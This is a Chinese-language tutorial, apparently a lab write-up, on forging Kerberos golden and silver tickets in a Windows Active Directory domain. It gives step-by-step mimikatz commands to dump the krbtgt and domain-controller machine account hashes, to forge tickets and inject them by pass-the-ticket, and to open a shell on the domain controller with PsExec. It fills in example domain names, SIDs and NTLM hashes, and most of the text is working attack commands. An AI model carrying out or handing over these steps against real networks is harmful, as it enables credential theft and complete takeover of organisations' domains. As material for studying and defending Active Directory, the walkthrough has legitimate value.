基础环境:
靶机:windwos server 2012 + windows 7
1.黄金票据
制作黄金票据的4个条件:
- 域名称
net time /domain
- 域的SID值
whoami /user
- 域的KRBTGT账户密码HASH
我们使用mimikatz提取:
mimikatz "lsadump::dcsync /domain:yuaneu.ro /user:krbtgt"
- 伪造用户名,可以是任意的
使用mimikatz生成黄金票据
mimikatz "kerberos::golden /domain:{域名称} /sid:{域的SID值} /krbtgt:{域的KRBTGT账户密码HASH} /user:{伪造用户名,可以是任意的} /ticket:{生成的票据文件}"
即
mimikatz "kerberos::golden /domain:yuaneu.ro /sid:S-1-5-21-1510176710-2219810952-449743168 /krbtgt:b71b4e4a428484726fea3c7d923c9715 /user:test6366 /ticket:golden.kirbi"
然后会在当前目录下生成票据文件golden.kirbi,一般默认黄金票据的有效期是10年
黄金票据的利用
首先我们先确实没有权限访问dc
首先我们将生成的票据复制到域成员机中,然后使用mimikatz将其导入到内存中
kerberos::purge
首相将原来缓存的票据全部删除
kerberos::ptt golden.kirbi
将黄金票据导入到内存中(Pass The Ticket)
然后我们可以通过mimikatz中的kerberos::list
,或者klist
查看以及缓存的票据
然后再次测试成功访问域控
当然也可以通过psexec.exe获取shell
PsExec.exe \\dc.yuaneu.ro cmd.exe
2.白银票据
制作白银票据的5个条件:
- 域名称
net time /domain
- 域的SID值
whoami /user
- 域中的Server服务器账户的NTLM-Hash
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
注意这里使用的不是Administrator账号的HASH,而是DC$的HASH。 - 伪造的用户名,可以是任意用户名.
- 目标服务器上面的kerberos服务
Service Type | Service Silver Tickets |
---|---|
WMI | HOST RPCSS |
PowerShell Remoting | HOST HTTP |
WinRM | HOST HTTP |
Scheduled Tasks | HOST |
Windows File Share (CIFS) | CIFS |
LDAP operations includingMimikatz DCSync | LDAP |
Windows Remote Server Administration Tools RPCSS LDAP | CIFS |
如果我们需要获取的服务是Windows File Share,那对应的kerberos服务是:CIFS
使用mimikatz生成白银票据
获取到域控主机的计算机账户的hash后,我们在域成员机上使用mimikatz生成白银票据
mimikatz "kerberos::golden /domain:{域名称} /sid:{域的SID值} /target:{目标服务器的域名全称} /service:{目标服务器上面的kerberos服务} /rc4:{域中的Server服务器账户的NTLM-Hash} /user:{伪造的用户名,可以是任意用户名} /ptt"
即
mimikatz "kerberos::golden /domain:yuaneu.ro /sid:S-1-5-21-1510176710-2219810952-449743168 /target:dc.yuaneu.ro /service:cifs /rc4:a9cd1dca5c2a2c56b9dd34c0dc782062 /user:silver /ptt"